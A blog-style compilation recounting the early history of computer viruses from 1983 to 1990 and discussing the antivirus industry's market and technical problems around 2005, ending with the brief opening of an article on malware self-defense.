Len Eidelmen first coined the term 'virus' in connection with self-replicating computer programs. On November 10th, 1983, at a seminar on computer safety at Lehigh Unversity, this grandfather of modern computer virology demonstrated a virus-like program on a VAX11/750 system. The program was able to install itself to other system objects. A year later, at the 7th annual information security conference, he defined the phrase 'computer virus' as a program which is able to 'infect' other programs by modifying them to install copies of itself.

1986
The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.

The Brain virus was written by a 19 year old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. Aside from infecting a disc's boot sector and changing the disk name to '© Brain', the virus did nothing; it had real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.

Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data.

That same year, a German programmer, Ralf Burger, invented the first programs that could copy themselves by adding their code executable DOS files in COM format. The working model of the program, named Virdem, was introduced by Burger in December 1986 in Hamburg at an underground computer forum, the Chaos Computer Club. Though most of the hackers at the event specialised in attacking VAX/VMS systems, they were still interested in the concept.

1987
The Vienna virus appeared: its appearance and subsequent spread around the world was hotly debated as the global community tried to discover the identity of the author. Franz Swoboda was the first person to detect the virus: his warning about the discovery of a self-replicating program named Charlie publicized by many information technology companies and attracted the attention of the media as well. As could be expected, many people were interested in discovering the author and the source of the epidemic. Information leaked out that Swoboda had received the virus from Ralf Burger, who completely denied Swoboda's story, and claimed that, on the contrary, he had received the virus from Swoboda. It was never revealed who had actually created the malicious program.

Despite the confusion surrounding the author of Vienna, its appearance was noteable for another reason. One of its potential authors, Rolf Burger, forwarded a copy to Bernt Fix, who was able to neutralize the virus. This was the first occasion when someone was able to neutralize a virus. Thus Fix was a precursor of modern anitvirus professionals, although contemporary antivirus experts not only analyze and neutralize viruses, but more importantly release protection, detection and disnfection modules.

Burger capitalized on Fix's work, and published the code used to neutralize Vienna in his book, Computer Viruses: The Disease of High Technology, which was analogous to B. Khizhnyak's Writing Viruses and Anti-Viruses. In his book, Burger explained how the virus code could be modified to eliminate its ability to replicate. However, the book probably gained popularity for explaining how viruses are created, serving as a stimulus for thousands of viruses which were partly or completely developed from ideas expressed in this book.

Several other IBM-compatible computer viruses appeared this year as well:

the famous Lehigh virus, named in honor of the university in Pennsylvania where it was first detected; this university is ironically the alma mater of the father of modern computer virology;
the Suriv family of viruses;
a number of boot-sector viruses in various countries;Yale in the US, Stoned in New Zealand, Ping Pong in Italy;
the first self-encrypting file virus, Cascade.
Lehigh made history as the first virus that caused direct damage to data: the virus destroyed information on discs. Fortunately, there were several computer experts at Lehigh Univeristy who were skilled at analyzing viruses. As a result, the virus never left the university, and Lehigh was never detected in the wild.

The Lehigh virus initiated a destructive routine that eventually deleted the virus as well as valuable data. Lehigh first infected only the command.com system files. After infecting four files it began destroying data, i.e. it eventually destroyed itself as well.

By this time, users had began taking security more seriously and learning how to protect themselves against viruses. More cautious users quickly learned to monitor the command.com file size once they knew that an increase in the file size of command.com was the first sign of potential infection.

The Suriv family of viruses (try reading the name backwards) written by an unidentified programmer from Israel was just as interesting. As with the Brain virus, it is difficult to determine whether this was merely an experiment that span out of control or the premeditated creation of a malicious program. Many antivirus experts were inclined to think that it was an experiment . The discovery at Yisrael Radai University of code fragments supported this version. The university was able to show that the virus's author was attempting to change the process for installing files in EXE format and the last modification of the virus was only a debugging version.

The first member of this virus family, aptly named by the author Suriv-1, was able to infect accessed COM files in real time. To do this, the virus loaded itself into the computer's memory and remained active until the computer was turned off. This allowed the virus to intercept file operations and, if the user loaded the COM file, to immediately infect it. This facilitated the almost instant spread of the virus to removable storage media.

Suriv-2, as opposed to its predecessor, targeted EXE files. It was, to all intents and purposes, the first virus able to penetrate EXE files. The third incarnation, Suriv-3, combined characteristics from the first and second versions and was able to infect both COM and EXE files.

The fourth modification of the virus, named Jerusalem, appeared shortly thereafter and was able to spread quickly worldwide; Jerusalem caused a worldwide virus epidemic in 1988.

The last significant event of 1987 was the appearance of the encrypted Cascade virus, which was named after part of its payload. Once the virus was activated, the symbols on the screen cascaded down to the bottom line (see cascade.bmp). The virus consisted of two parts - the virus body and an encryption routine. The latter encrypted the body of the virus so that it appeared different in every infected file. After loading the file, control was transferred to the encryption routine which decoded the virus body and transferred control to it.

This virus can be considered the predecessor of polymorphic viruses which have no permanent program code yet maintain their functionality. However, unlike future polymorphic viruses, Cascade encoded only the body of the virus. The size of the infected file was used as a decryption key. The decryption routine remained unchanged which allows modern antivirus solutions to detect the virus with ease.

In 1988, Cascade caused a serious incident in IBM's Belgian office and served as the impetus for IBM's own antivirus product development. Prior to this, any antivirus solutions developed at IBM had been intended for internal use only.

Later, Mark Washburn combined information published by Ralf Burger on the Vienna virus with the concept of self-encryption used in Cascade and created the first family of polymorphic viruses: the Chameleon family.

IBM computers were not alone: viruses were written for Apple Macintosh, Commodore Amiga, and Atari ST.

In December 1987, the first major local network epidemic occurred: the Christmas Tree Worm, which was written in REXX spread on VM/CMS-9 operating systems. The worm was unleashed on the Bitnet network on December 9th from a West German university through a European Academic Research Network (EARN) portal and then onto IBM's Vnet. Within four days (on December 13th), the virus had flooded the network. Upon loading, the virus displayed a Christmas tree on-screen and sent copies of itself to all network users whose addresses were listed in the NAMES and NETLOG system files.

1988
Suriv-3, or the Jerusalem virus, as it is known today, caused a major epidemic in 1988. It was detected in many enterprises, government offices and academic institutions on Friday, May 13th. The virus struck all over the world, but the US, Europe and the Near East were hit hardest. Jerusalem destroyed all loaded files on infected machines.

May 13th 1988 came to be known as Black Friday. Ironically, antivirus experts and virus writers all pay close attention when the 13th of any month falls on a Friday. Virus writers are more active, while virus analysts treat it as a professional mini-holiday.

By this time, many antivirus companies had been established around the world. Generally, these were small firms, usually with two or three people. The software consisted of simple scanners that performed context searches to detect unique virus code sequences.

Users also appreciated the immunizers that came with the scanners. These immunizers would modify programs in such a way that a virus would think the computer was already infected and leave them untouched. Later, when the quantity of viruses increased into the hundreds, immunizers were rendered ineffective, as the number of immunizers required for the viruses in the wild was simply unrealistic to manufacture.

Both types of antivirus programs were either distributed for free or were sold for ridiculously low prices. Despite this, they failed to gain enough popularity effectively counter virus epidemics. Furthermore, the antivirus programs were completely helpless in the face of new viruses: imperfect channels for data transmission and the lack of a unified worldwide computer network like the modern Internet made the delivery of updated versions of antivirus programs extremely difficult.

The spread of viruses like Jerusalem, Cascade, Stoned and Vienna was also facilitated by human factors. First, users of that era did not know enough about the need for antivirus protection. Second, many users, and even professionals, didn't believe in the existence of computer viruses.

For instance, even Peter Norton, whose name is synonymous today with many products of US-based Symantec, was skeptical about computer viruses at one stage in his career. He declared their existence to be a myth and compared them to stories of large crocodiles inhabiting the sewers of New York. This incident didn't stop Symantec, however, from shortly after developing its own antivirus project, Norton AntiVirus.

This was an important year for the antivirus community as well: the first electronic forum devoted to antivirus security was opened on April 22. This was the Virus-L forum on the Usenet network created by Ken van Wyk, a university colleague of Fred Cohen's.

The first widespread virus hoax was also registered in 1988. This very interesting phenomenon refers to the spread of rumors about dangerous new viruses. Actually, in some cases, these rumors worked liked a virus. Scared users would spread these rumors at the speed of light. It goes without saying that these hoaxes did not harm anyone, however, they used up bandwidth and users' nerves and discredited those that initially believed the rumours.

Mike RoChennel (a pseudonym derived from the word 'Microchannel'), was the author of one of the first hoaxes.In October 1988, Mike sent a large number of messages to BBSs regarding an virus which could transfer from one 2400 baud modem to another. A suggested antidote to this virus was to use modems with a speed of 1200 bauds. However ridiculous this may have sounded, many users did indeed heed this advice.

Another such hoax was released by Robert Morris about a virus spreading over networks and changing port and drive configurations. According to the warning, the alleged virus infected 300,000 computers in the Dakotas in under 12 minutes. November 1988: a network epidemic caused by the Morris Worm. The virus infected over 600 computer systems in the US (including the NASA research center) and almost brought some to a complete standstill. Like the Christmas Tree worm, the virus sent unlimited copies of itself and completely overloaded the networks.

In order to multiply, the Morris Worm exploited a vulnerability in UNIX operating systems on VAX and Sun Microsystems platforms. As well as exploiting the UNIX vulnerability, the virus used several innovative methods to gain system access such as harvesting passwords.

The overall losses caused by the 'Morris Worm' virus were estimated at US $96 million dollars - a significant sum at the time.

Finally, a popular antivirius program; Dr. Solomon's Anti-Virus Toolkit was released onto the market in 1988. The program was created by UK programmer, Alan Solomon, and was widely used until 1998 when the company was taken over by US-based Network Associates (NAI).

1989
The Datacrime and FuManchu (a Jerusalem modification) viruses as well as virus families Vacsina and Yankee appeared.

The Datacrime virus was extremely dangerous: from October 13th through December 31st, it initiated low-level formatting of a hard disc's zero cylinder which led to the destruction of tables stored in FAT files and irrevocable loss of data.

The first warning about the virus came out of the Netherlands in March from Fred Vogel. Despite the relatively low infection rate, Datacrime evoked a hysterical reaction worldwide. The repeated warnings resulted in significantly distorted descriptions of how the virus really worked and what damage it caused.. In the US, the virus was named Columbus Day because many speculated that the virus had been written by Norwegian terrorists attempting to punish Americans for crediting Columbus instead of Eric the Red with the discovery of America.

An interesting incident occurred in Holland. The local police decided to begin a proactive fight against cyber-crime. They developed an antivirus program capable of neutralizing Datacrime and sold it directly to local precincts for a mere $1. There was tremendous demand for the antivirus program, but it was soon discovered that the program was unreliable and had a high false positive rate. A second version was produced to correct the mistakes; however, it was also riddled with bugs.

October 16th, 1989 saw the appearance of the WANK worm on VAX/VMS computers on the SPAN network. The worm spread via the DECNet protocol and changed system messages to read, 'WORMS AGAINST NUCLEAR KILLERS' accompanied by the message, 'Your System Has Been Officially WANKed.' WANK also changed system passwords to random symbols and sent them to a user by the name of GEMPAK on the SPAN network.

December 1989 witnessed the Aids Information Diskette incident. 20,000 discs containing a Trojan were sent to addresses in Eurpose, Africa, Australia and the WHO. The addresses had been stolen from the database of PC Business World. Once an infected disk has been loaded, the program would automatically install itself on the system, creating its own concealed files and directories and modifying system files. After 90 loads, the operating system encoded the names of all files, rendering them invisible and leaving only one file accessible. This file recommended paying money to a specified bank account. As a result, it was relatively easy to identify the Trojan's author as one Joseph Popp who had earlier been declared insane. Despite this, he was convicted in absentia by Italian authorities.

It is interesting to note that 1989 marked the beginning of virus epidemics in Russia as well. Towards the end of 1989, approximately 10 viruses (listed in the order they arrived) appeared in Russian cyber-space: 2 versions of Cascade, several modifications of Vacsina and Yankee, Jerusalem, Vienna, Eddie, and PingPong.

The spread of high technology worldwide predetermined the appearance of new antivirus projects throughout the world, just as it did in Russia-or at that time, the USSR. In 1989, antivirus expert Eugene Kaspersky, who would later found Kaspersky Lab, first ran into a virus: his work computer was infected by Cascade in October 1989. It was this incident that led Eugene to devote his life to antivirus research.

Only a month later, Eugene detected the Vascina virus using the first version of the -V antivirus program he had just written. Years later, -V turned into AVP Antiviral Toolkit Pro.

In fact, 1989 saw a bumper crop of antivirus companies: F-Prot, ThunderBYTE, and Norman Virus Control.

So many people became so nervous about viruses that various groups and individuals asked IBM, then undisputed leader in the IT market, to provide an antivirus solution. IBM in turn decided to commercialize the internal antivirus project they were running. IBM Virscan for MS-DOS went on sale in October 1989.

After brief consideration and market research, IBM decided to 'declassify' its antivirus project as developed in its TJ Watson Research Center and turn it into a full commercial product. IBM Virscan for MS DOS was first made available for purchase in October 1989 for only $35 dollars.

April of 1989 marked another landmark in the antivirus field: the first antivirus publications were founded. UK-based Sophos sponsored Virus Bulletin, whereas Dr. Solomon's founded Virus Fax International. Virus Bulletin exists to this day, while Virus Fax International was first renamed as Virus News International and eventually metamorphosed into Secure Computing.

Today, Secure Computing is considered one of the most popular sources in information technology security and specializes not only in antivirus programs but also in computer and device safety. Secure Computing conducts annual contests under the 'Secure Computing Awards' title for the best developments in various fields, including antivirus safety, cryptology, access-control, intranet screens, and others.

1990
1990 saw several important developments in virus writing. Virus writers developed new features and establish well-publicized communities to share information.

To start with, the first polymorphic viruses appeared in 1990: the Chameleon family (1260, V2P1, V2P2, and V2P6), which evolved from two earlier well-known viruses, Vienna and Cascade. Chameleon's author, Mark Washburn, used Burger's book on the Vienna virus and then added features from the self-encoding Cascade virus. Unlike Cascade, Chameleon was not only encrypted, but the virus code also changed with every infection. This particular feature rendered contemporary antivirus programs useless. Up to that point, antivirus programs had depended on an ordinary context search, for pieces of known virus code. Chameleon did not have permanent code which made the development of new types of antivirus programs priority number one. These developments were not long in coming. Soon thereafter, antivirus experts invented special algorithims to identify polymorphic viruses. Later, in 1992, Eugene Kaspersky developed an even more effective method for neutralizing polymorphic viruses: a processor-emulator for deciphering codes. Today, this technology is an integral attribute of all antivirus programs.

The second important milestone was the appearance of the Bulgarian Virus Producing Factory. Throughout this year and for a number of years afterwards, a large number of viruses of Bulgarian origin were detected in the wild. They included entire virus families such as Murphy, Nomenclatura, Beast (or 512 or Number of Beast), new modifications of Eddie, and many more.

A virus writer named Dark Avenger was particularly active: he released several viruses a year, which incorporated new infection and concealment techniques. It was Dark Avenger who first employed a technique where the virus, when detected, would automatically infect all files in the computer, even if the file was opened for read-only purposes. Dark Avenger demonstrated exceptional ability, not only in creating viruses, but in spreading them as well. He actively loaded infected programs onto BBSs, distributed source codes for his viruses, and advocated the creation of new viruses in every way possible.

The first BBS (VX BBS) aiming to provide an open forum for the exchange of viruses and information for virus writers was established in Bulgaria, probably by Dark Avenger. The philosophy behind the board was simple: if a user uploaded a virus, then in exchange he was allowed to download one from the board's catalog. If the user submitted a new and interesting virus, then he was granted full access to the board's resources and could download an unlimited quantity of viruses from the collection. It almost goes without saying what a powerful effect VX BBS had on the development of viruses, especially since the board was open to the whole world, not just Bulgaria.

In July of 1990, a serious incident occurred with the English computer magazine PC Today. Each issue of the magazine contained a free floppy disc which turned out to be infected with a copy of DiskKiller. More than 50,000 copies of the magazine were sold. The resulting epidemic made virology history!

Two innovative stealth viruses appeared in the second half of 1990: Frodo and Whale. Both used an incredibly complex algorithm to conceal themselves in the system. The nine kilobyte Whale, in addition, employed several levels of encryption and whole array of tricky anti-debugging techniques.

The first Russian viruses appeared: Peterburg, Voronezh, and LoveChild.

In December of 1990, EICAR (European Institute for Computer Antivirus Research) was established in Hamburg, Germany. The institute is still considered one of the most respected international organizations, uniting professionals from practically all major antivirus companies.

Virus Industry and Chalenges

2008-06-07T09:44:00.000-07:00

The Internet today is a breeding ground for criminal activity. Home users, small and medium businesses, international corporations and governmental bodies all suffer from constant attacks by viruses and Trojans. The reasons why the Internet is in this condition have been widely discussed, and will continue to be discussed. But what do I meant when I say that the Internet is a fertile environment for crime? At bottom, it means that money is being made illegally by creating and distributing malicious programs, which will:

steal personal and corporate bank account information
steal credit card numbers
conduct DDoS attacks, with the instigators then demanding money to stop the attacks - a cyber racket)
create networks of Trojan proxy servers. These can be used to send spam, and for commercial gain
create zombie networks, which can be exploited in multiple ways
create programs which download and install adware to the victim machine
install Trojan dialers which will repeatedly call pay services
etc.

It's difficult to say exactly how widespread criminal activity is. I think that there are dozens, if not hundreds of hacker groups and individual hackers active in the computer underground. The hackers who belong to groups can probably be numbered in the thousands - this is according to the law enforcement agencies of most computerized countries. Over the last few years several dozen hackers and hacker groups have been arrested, and the total number of arrests topped several hundred. However, this doesn' t seem to have had any real effect on the number of viruses and Trojans.

Another figure which can only be guessed at is the total turnover of the computer underground. Published sources estiamte that between 2004 and 2005 hackers either stole or scammed several hundred million dollars. As the vast majority of cyber criminals have not been arrested or imprisoned, we can assume that the annual turnover is probably billions of dollars. (This figure may well exceed the annual turnover of antivirus companies - for these figures, see below.)

The total damage done to the world economy by the activity of virus writers, hackers and spammers has long since exceeded tens of billions of dollars annually. The amount continues to grow. According to research carried out by Computer Economics, total losses in 2004 were close to $18 billion, with a trend towards a 30 - 40% annual growth rate.

Let's take a look at the players in the world of cyber threats:

Virus writers and hackers are creating and distributing viruses and Trojans for their own reasons
End users' machines and networks are under constant threat of hacker attacks, and may often fall victim to co-ordinated attacks
Police and law enforcement bodies throughout the world are only partially successful in investigating and prosecuting cyber crimes
Antivirus companies create software to counteract cyber threats

There's been a great deal written about viruses, hackers, and those who hunt them down - there have even been Hollywood films made on the subject. The developers and vendors of antivirus solutions use their web sites to publicize their achievements. However, there isn't much information about the problems which the antivirus industry faces. This article, therefore, aims to address this topic and, to some extent, rectify the imbalance.

A short overview of the antivirus industry
To start with, let's take a look at the companies manufacturing standard solutions which protect against computer viruses. (We'll discuss dedicated solutions and tools a little later in the article.) By standard solutions, I mean software for desktops, file servers, mail servers, and the perimeter of corporate networks.

The total market for such standard solutions was estimated as being $2.7 billion in 2003 and $3.3 billion in 2004, with $3.8 billion being the predicted figure for 2005. (All information in this section is taken from IDC, 2005). All antivirus manufacturers are divided into 3 groups; industry leaders, second tier companies, and others (those which have no significant effect - if any - on the antivirus landscape).

The leaders include Symantec, McAfee (NAI) and Trend Micro - the activity of these companies affects all markets:

Company Annual turnover, $mln
2003 2004
Symantec 1098 1364
McAfee (NAI) 577 597
Trend Micro 382 508

These three companies occupy leading positions in all markets, with a few exceptions (for instance, Trend Micro dominates the Japanese market). Symantec and NAI (McAfee) are North American. Trend Micro is originally a Taiwanese company which was floated on the Japanese stock market. It is currently headquartered in the USA.

The second tier includes companies whose turnover is significantly lower than the leading three. However, these companies still have an annual turnover of tens of millions of dollars:

Company Annual turnover, $mln
2003 2004
Sophos (UK) 97 116
Panda Software (Spain) * 65 104
Computer Associates (USA) 61 74
F-Secure (Finland) 36 51
Norman (Norway) 23 31
AhnLab (S.Korea) 21 28
*Panda Software is a private company. Financial information given is unaudited

Kaspersky Lab, based in Russia, is also included in this group. However, the company does not disclose financial information.

The majority of second tier companies have a significant presence in their respective domestic markets, but a relatively small presence in foreign markets. For instance, Sophos is most successful in the UK, Panda in Spain, F-Secure in Scandinavian countries etc.

The third group includes several dozen antivirus companies. The best known include:

Alwil - Awast (the Czech Republic)
Arcabit - MKS (Poland)
Doctor Web - DrWeb (Russia)
ESET - NOD32 (Slovakia)
Frisk Software - F-Prot (Iceland)
GriSoft - AVG (the Czech Republic)
H+BEDV - AntiVir (Germany)
Hauri - VI Robot (South Korea)
SoftWin - BitDefender (Romania)
VirusBuster - VirusBuster (Hungary)
The third group also includes UNA and Stop! (both Ukrainian), Rising and KingSoft (China) and others.

The majority of companies in this group do not disclose any financial information. However, some estimates state that annual turnover is around $10 million.

This information above gives a breakdown of antivirus companies' market share. However, companies offering products based on licensed technologies aren't included. Examples are the German company G-Data, whose antivirus solution is based on Kaspersky Lab and SoftWin technologies, and Microsoft, which offers a multi-engine solution developed by Sybari.

There are also some non-standard types of antivirus protection, some of which are relatively specialized. This includes systems which will delete any potential threat from corporate email messages (the end user receives only messages without executable attachments or html scripts), systems which will launch the web browser within a virtual machine etc. There are also some programs which are fairly similar to antivirus solutions: software which protects against DDoS attacks, patch management software etc. However, none of these can be called fully functional antivirus products.

Problems of the antivirus industry
What problems might the antivirus industry be facing, apart from the market headaches which plague any manufactuer of consumer goods. We all know that viruses exist, and so do antivirus solutions. It might seem that antivirus solutions are a standard consumer product - one solution barely differs from the next. Users choose their product according to design, or marketing, or for some other non-technical reason. Given this, an antivirus solution is, in theory, just another consumer product, like washing powder, toothpaste, or cars.

Unfortunately (or perhaps fortunately) this is not the case. Users often chose an antivirus solution for its technical characteristics, and these differ widely between products. Users often focus on whether or not a specific product protects against a specific type of cyber threat, and the overall level of protection offered.

An antivirus solution should be able to protect against ALL types of malicious program. The better the antivirus solution, the happier users and system administrators will be. Anyone who doesn't understand this in theory will very soon be faced with the practical consequences; without a good antivirus solution, someone can start stealing money from the user's bank account, or the computer may start dialing phone numbers of its own accord, leaving the user to wonder why outgoing traffic has increased so much. Given this, users should have some idea of what protection is offered by antivirus solutions, so that an informed choice can be made.

Let's say that antivirus solution X detects, let's say, 50% of all viruses currently circulating on the Internet; product Y detects 90%, and product Z, 99.9%. N number of attacks will result in either the computer's integrity being maintained, or the system becoming infected. If the computer is attacked 10 times, then the likelihood of product X failing to detect a malicious program is virtually guaranteed; product Y is more than likely to fail to detect the culprit; and in the case of product Z, the danger is almost infinitesimal.

Unfortunately, there are relatively few products available in shops or on the Internet which offer even close to 100% protection. The majority of products are unable even to guarantee 90% protection. And this is the main problem facing the antivirus industry today.

Problem #1
The number and variety of malicious programs is increasing year on year. The result is that many antivirus companies are simply unable to cope with the onslaught and are losing this 'virus arms race'. Users who chose products manufactured by such companies will not be protected against all malicious programs. Unfortunately, this may be a large number of users, as a lot of products marketed as 'antivirus solutions' shouldn't really be called this at all.

Incidentally, five or ten years ago, it could honestly be said that an antivirus solution didn't need to protect systems against every new virus and Trojan. After all, the majority of new malicious programs which were appearing at this time would never penetrate the user's computer. They were written by adolescent cyber vandals, who either wanted to show off their coding skills, or to satisfy their curiosity. Users only really needed protection against the few In The Wild viruses which managed to actually penetrate victim machines. However, the situation has now changed. More than 75% of malicious programs - i.e. the overwhelming majority - are created by the criminal computer underground, with the aim of infecting a defined number of computers on the Internet. The number of new viruses and Trojans is now increasing every day by a few hundred - the Kaspersky Virus Lab receives between 200 and 300 new samples a day.

These samples come from several sources - honeypots (dedicated machines used to collect malicious files on the Internet); users of infected machines; local network administrators; ISPs; and from other antivirus companies, strange though this may sound. In spite of market segmentation of antivirus companies (which happens with any market, without exception), antivirus companies do work with each other. If a new worm which propagates quickly is detected by one antivirus company, the analysts will inform competitor companies almost immediately, and forward a sample of the worm. And the majority of antivirus companies exchange virus samples at least one a month. They also exchange information at dedicated professional gatherings, which are not open to those outside the industry. It could be seen as professional ethics; antivirus companies do share information with other antivirus companies, except for those companies which may have damaged their standing in the antivirus world through unethical behaviour.

Let's suppose that a new virus or Trojan is detected in the wild, either on the Internet or on an infected computer. And what does this mean? It means that the likelihood that a certain computer will be infected by a parasite is far from zero, and it's possible that dozens, hundreds or maybe even thousands of the computers which make up the Internet are already infected. And given how quickly the Internet works, if the latest 'beastie' is a network worm, then the number of victims could be in the millions. Consequently, antivirus companies have to able to release rapid updates to antivirus databases, and these updates have to include protection against all the newest viruses and Trojans. This brings us on to the second problem faced by the antivirus industry.

Problem #2
Today, malicious programs propagate so quickly that antivirus companies have to release updates as quickly as possible to minimize the amount of time that users will potentially be at risk. Unfortunately, many antivirus companies are unable to do this - users often receive updates once they are already infected.

Let's assume that the virus manages to penetrate the victim machine, and the antivirus solution installed on the victim machine doesn't detect any suspicious activity. (This might be because of the quality of the solution itself, or because the user has been careless, and not downloaded the latest updates to the antivirus databases in good time.) Sooner or later, updates which detected the virus will be released - this means that the virus will be detected, but not necessarily defeated. To get rid of the virus once and for all, the infected files have to be carefully deleted from the victim machine. “Carefully” is the key word here, which brings us to the third problem connected with antivirus programs.

Problem #3
The third problem faced by the antivirus industry is deleting malicious code detected on the victim machine. Very often viruses and Trojans are written in a way which enables them to hide their presence in the system and/ or to penetrate the system so deeply that deleting them is a complex task. Unfortunately, some antivirus programs are unable to delete malicious code and restore the data which has been modified by the virus without causing further problems.

An additional issue is that all software uses system resources, and antivirus programs are no exception. In order to protect the computer, the antivirus program has to perform certain actions - open files, read information in them, open archives to scan them etc. etc. The more thoroughly a file is checked, the more resources are required by the antivirus solution. In this way, an antivirus solution is similar to a security door - the thicker the door is, the more protection it will offer; however, the heavier the door is, the more difficult open and closing it will be. When talking about antivirus solutions, the problem is balancing program speed against the level of protection provided.

Problem #4
Unfortunately, the issue of resource usage is almost insoluble. Experience shows that antivirus solutions which offer rapid scanning are heavily flawed, and will let viruses and Trojans through like water through a sieve. However, the opposite is also not true; antivirus programs which run slowly do not necessarily offer effective protection.

In order to scan files on the fly and provide constant protection for the computer, an antivirus solution has to penetrate relatively deeply into the kernel of the system. It will always penetrate the same levels. Technically speaking, an antivirus program has to install interceptors of system events deep inside the protected system and transmit the results to the antivirus engine in order that intercepted files, network packets and other potentially dangerous objects can be scanned.

However, sometimes it's simply not possible to install two interceptors in the necessary kernel level of the operating system. The result is incompatibility between the antivirus monitors (which function constantly), as the second antivirus will either be unable to intercept system events, or the attempt to duplicate the interception mechanism can lead to system crash. And this is at the heart of the next problem of the antivirus industry.

Problem #5
Incompatibility between antivirus programs is an issue; in the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning.

People often think that antivirus companies are acting like toddlers snatching at each other's toys, that the incompatibility issue is caused by unfair competition, and specially designed in order to squeeze other manufacturers out of the market. However, this is not the case. There is no question of unfair or unethical competition. On the contrary, developers make every effort they can to ensure that their product does not conflict with other popular software (including antivirus solutions.)

Above, I've tried to summarize what I think are fundamental issues faceing today's antivirus industry. So how is the industry going to address this issues? What type of protection will antivirus companies offer in the future?

New technologies vs. traditional solutions
Naturally enough, from time to time antivirus developers want to invent quintessentially new technologies, which will solve the problems listed above at a single stroke, a kind of universal panacea. This proactive protection would make it possible to detect a virus and delete it prior to the virus actually being created and appearing on the Internet - and this could be applied to all emerging virus threats.

Unfortunately, this simply isn't possible. A 'universal' solution is only effective against those threats which act in accordance with constant, well defined rules. As computer viruses aren't a natural occurrence, but the creation of the intricate workings of hackers' minds, they are not subject to any fixed rules. Rather, viruses abide by a set of rules which will constantly change in accordance with the goals of the computer underground.

Let's take the example of the behaviour blocker, which is a competitor to traditional antivirus solutions which are based on virus signatures. These are two completely different approaches scanning for viruses, which are not necessarily mutually exclusive. A signature is a small piece of code which can be compared to files, and the antivirus solution checks to see if the two are identical. A behaviour blocker, on the other hand, tracks application behaviour on launch, and will terminate programs if suspicious or known malicious behaviour is detected. Both methods have their advantages and disadvantages.

One benefit of a signature scanner is that it detects all malicious code that it recognizes. The minus is that it will fail to detect malicious code which it hasn't encountered before. Another potential minus is the large size of antivirus databases and the resources they consume. Behaviour blockers offer benefits in that they are able to detect even unknown malicious programs. On the minus side is the possibility of false positives; the behaviour of today's viruses and Trojans is so diverse that devising a single set of rules which encompasses all possible behaviours is simply impossible. This means that the behaviour blocker is certain to fail to detect some malicious programs, and will periodically prevent legitimate applications from functioning.

Behaviour blockers have another inherent disadvantage; they are unable to combat conceptually new malicious programs. Let's imagine that Company X has developed a behavioural antivirus AVX, which detects 100% of current malicious programs. So what will the hackers do? Of course, they will invent new types of malicious programs. And then of course it will be necessary to update the behavioural rules. And then update them again, because the hackers and virus writers aren't going to give up that easily. And then update them again and again and again. At the end of the day, we arrive at a signature scanner, except the signatures will be behavioural, and not pieces of code.

This conclusion also applies to the heuristic analyser, another proactive protection method. As soon as hackers perceive that antivirus technologies are preventing them from reaching their victims, they invent new virus technologies which will be used to evade proactive detection. As soon as a product with advanced heuristics and/ or behaviour blocking is widely used, the 'advanced' technologies employed will cease working.

This means that 'reinvented' proactive technologies are only effective for a relatively short length of time. Where junior hackers need a few weeks or a couple of months to get round proactive protection, professional hackers will need one or two days, or, in the worst case, a few minutes or hours. This means that behaviour blockers or heuristic analyzers, however effective they may be, need constant development and updating. It should also be noted that adding new signatures to antivirus databases is a matter of a few minutes, whereas perfecting and testing proactive protection methods takes much longer. The result is that in many cases signature updates to antivirus databases are far better that the average proactive protection solution. The experience of epidemics caused by new email and network worms, new spy programs and other types of malicious code bears this theory out.

Of course this doesn't mean that proactive protection is useless. It functions well within specific boundaries, and is capable of stopping a certain amount of malware (the programs created by less experienced hackers and virus writers,) For this reason, proactive protection can be an useful addition to signature scanners, but they should not be relied upon to provide total protection.

Comparative testing and its weaknesses
This part of the article looks at the problems users may have when choosing an antivirus solution. It's assumed that the user will be looking for a product which offers real protection against malicious code. So where can they get information to base their decision on?

The most logical thing is naturally to look at comparative test results from different sources, including professional ones. Do such things exist? Yes, they do, but there aren't many of them. Most IT publications conduct comparative tests of antivirus solutions on a fairly regular basis. They test the solutions thoroughly, and compare everything from the product price to the quality of technical support provided. However, these tests don't really prove the quality of the antivirus function. This is understandable, as testers would need a fairly large virus collection, their own tests stands, and automated testing procedures to thoroughly testing the antivirus component. This means a dedicated group which only tests antivirus solutions, and which requires the necessary resources - something which most IT publications don't have. Comparative tests conducted by IT publications therefore either leave much to be desired, or the publications contact experts who specialize in testing antivirus products.

Currently, the most experienced testers of antivirus products currently are Andreas Marx (Germany http://www.av-test.org) and Andreas Clementi (Austria http://www.av-comparatives.org).These tests describe in detail the quality of detection of various types of malicious programs and the speed at which different antivirus companies react to epidemics. The tests are thorough and detailed, and can be used to compare the characteristics of the antivirus solutions themselves. Sadly, these tests only examine the two characteristics described above; they do not address issues of how antivirus solutions perform in real life situations e.g. when curing an infected system, the reaction of the solution to infected web sites, the amount of resources used, and the thoroughness with which archives and installers are checked.

Sadly, tests which provide an in-depth, accurate picture of how products react in typical situations barely exist. The one exception that we know of is the Test Lab at Moscow State University, which conducts tests using a fairly wide range of situations. However, the methodology of these tests still needs working on, and the university's test lab is not yet known to the public at large.

It's also worth mentioning the tests conducted by VirusBulletin (an industry publication) - I am sure that if I didn't include this, readers would ask why the tests and the resulting VB100% award hadn't been mentioned. Sadly, these tests are far from perfect. The test standards were developed in the mid-1990s and have barely changed since then. Antivirus products are tested using a collection of files infected by ITW viruses. The award is given on the basis of the test results. However, the ITW collection only contains between two to three thousand files - fewer malicious programs than appear in the wild in the space of a single month. Therefore, a VB100% award doesn't necessarily mean that a product really provides protection against all types of malware. It simply means that the product copes well with VirusBulletin's ITW collection, nothing more.

Conclusion
I hope that those of you who have read this far now have a better understanding of the issues which the antivirus industry faces, and that it will help you when selecting an antivirus solution for your home computer or network. I think that a computer which is connected to the Internet is rather like sex - it can be safe, or it can be unsafe. In both cases, information is the key to survival, and can protect you from unpleasant consequences. Happy surfing!

Virus Defense and Our Defense

2008-06-07T09:37:00.000-07:00

Malware Defensivism>

This article explores how malware has developed self-defense techniques and how these techniques have evolved as it has become more difficult for viruses to survive. It also provides an overview of the current situation.

